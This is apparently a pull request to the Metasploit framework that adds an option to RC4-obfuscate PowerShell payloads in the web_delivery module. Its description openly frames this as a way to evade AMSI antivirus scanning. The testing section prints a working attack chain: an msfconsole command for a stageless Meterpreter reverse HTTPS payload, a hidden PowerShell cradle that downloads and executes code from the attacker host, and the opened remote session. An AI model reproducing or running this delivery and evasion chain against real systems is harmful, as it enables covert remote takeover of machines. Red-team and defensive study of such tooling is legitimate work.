### PR TITLE
Add option powershell::exec_rc4 in web_delivery

### DIFF
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -15,6 +15,7 @@ module Exploit::Powershell
         OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]),
         OptBool.new('Powershell::sub_funcs', [true, 'Substitute function names', false]),
         OptBool.new('Powershell::exec_in_place', [true, 'Produce PSH without executable wrapper', false]),
+        OptBool.new('Powershell::exec_rc4', [true, 'Encrypt PSH with RC4', false]),
         OptBool.new('Powershell::remove_comspec', [true, 'Produce script calling powershell directly', false]),
         OptBool.new('Powershell::noninteractive', [true, 'Execute powershell without interaction', true]),
         OptBool.new('Powershell::encode_final_payload', [true, 'Encode final payload for -EncodedCommand', false]),
@@ -210,7 +211,9 @@ module Exploit::Powershell
   #   re-execution if the shellcode finishes
   # @option opts [Integer] :prepend_sleep Sleep for the specified time
   #   before executing the payload
+  # @option opts [Integer] :exec_rc4 Encrypt payload with RC4
   # @option opts [Boolean] :prepend_protections_bypass Prepend AMSI/SBL bypass
+  # @option opts [Boolean] :exec_rc4 Encrypt payload with RC4
   # @option opts [String] :method The powershell injection technique to
   #   use: 'net'/'reflection'/'old'
   # @option opts [Boolean] :encode_inner_payload Encodes the powershell
@@ -224,7 +227,7 @@ module Exploit::Powershell
   #
   # @return [String] Powershell command line with payload
   def cmd_psh_payload(pay, payload_arch, opts = {})
-    %i[persist prepend_sleep prepend_protections_bypass exec_in_place encode_final_payload encode_inner_payload
+    %i[persist prepend_sleep prepend_protections_bypass exec_in_place exec_rc4 encode_final_payload encode_inner_payload
     remove_comspec noninteractive wrap_double_quotes no_equals method].map do |opt|
       opts[opt] = datastore["Powershell::#{opt}"] if opts[opt].nil?
     end


### PR DESCRIPTION
This options makes use of RC4 for obfuscating powershell payloads. See
https://github.com/rapid7/rex-powershell/pull/14.

Now that the PR in rex-powershell has been merged, I am submitting this
PR which provides the new option powershell::exec_rc4 to make use of the
functionality added by the other PR. It enables using unstaged payloads
in web_delivery and obfuscates everything with RC4.

At first I wanted to include an AMSI bypass, but the maintainers were
against it, as it is a rapidly moving target. However, please note that
I'm using the same idea in another project of mine
(https://github.com/AdrianVollmer/PowerHub) and Matt Graber's original
AMSI bypass still works when obfuscating each string with RC4. Since the
point of RC4 was to bypass AMSI, the only advantage of this PR is that you
can use large (i.e. unstaged) payloads. So maybe the name of the option
should be something else, I'm open for suggestions.

For verification and testing, the following output shows the steps you
need to take (here all included in the command line). Obviously, LHOST
needs to be adjusted.

    $ msfconsole -x 'use exploit/multi/script/web_delivery; set target 2; set payload windows/x64/meterpreter_reverse_https; set lhost 192.168.11.2; set powershell::exec_rc4 true; set uripath rc4; run'
    [...]
    15:43:34>192.168.11.2[0] exploit(multi/script/web_delivery) >
    [*] [2019.10.26-15:43:34] Started HTTPS reverse handler on https://192.168.11.2:8443
    [*] [2019.10.26-15:43:34] Using URL: http://0.0.0.0:8080/rc4
    [*] [2019.10.26-15:43:34] Local IP: http://192.168.11.2:8080/rc4
    [*] [2019.10.26-15:43:34] Server started.
    [*] [2019.10.26-15:43:34] Run the following command on the target machine:
    powershell.exe -nop -w hidden -c $K=new-object net.webclient;$K.proxy=[Net.WebRequest]::GetSystemWebProxy();$K.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $K.downloadstring('http://192.168.11.2:8080/rc4');
    [*] [2019.10.26-15:43:37] 192.168.11.3     web_delivery - Delivering Payload (372601) bytes
    [*] [2019.10.26-15:43:38] https://192.168.11.2:8443 handling request from 192.168.11.3; (UUID: rlscader) Redirecting stageless connection from /ZyJn03h_PH9FDUQPGLkIhww9tmyD1k4jPjMnjneqaASfzgzxsFJHS0VFH8s with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
    [*] [2019.10.26-15:43:38] https://192.168.11.2:8443 handling request from 192.168.11.3; (UUID: rlscader) Attaching orphaned/stageless session...
    [*] Meterpreter session 1 opened (192.168.11.2:8443 -> 192.168.11.3:49820) at 2019-10-26 15:43:38 +0200
    sessions -i 1
    [*] Starting interaction with 1...

    meterpreter > sysinfo
    Computer        : SYSS-AVOLLMER-W
    OS              : Windows 10 (10.0 Build 18362).
    Architecture    : x64
    System Language : de_DE
    Domain          : WORKGROUP
    Logged On Users : 2
    Meterpreter     : x64/windows